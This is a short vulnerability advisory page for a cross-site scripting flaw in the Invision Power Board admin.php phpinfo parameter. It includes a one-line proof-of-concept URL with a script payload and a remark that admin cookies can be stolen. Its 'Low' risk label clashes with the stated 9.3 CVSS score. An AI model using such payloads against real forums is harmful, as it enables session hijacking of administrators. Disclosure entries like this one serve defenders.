Invision Power Board XSS

2007.03.02
Credit: Anonymous
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

*//Product :Invision Power Board *//Version :2.1.6 and prior versions must be affected. *//XSS= http://localhost/forum/admin.php?phpinfo=<script>alert()</script> *//You can steal only admins cookie. *//www.spymastersnake.org *//kepche<img src="/imgs/at.gif" border=0 align=middle>msn.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top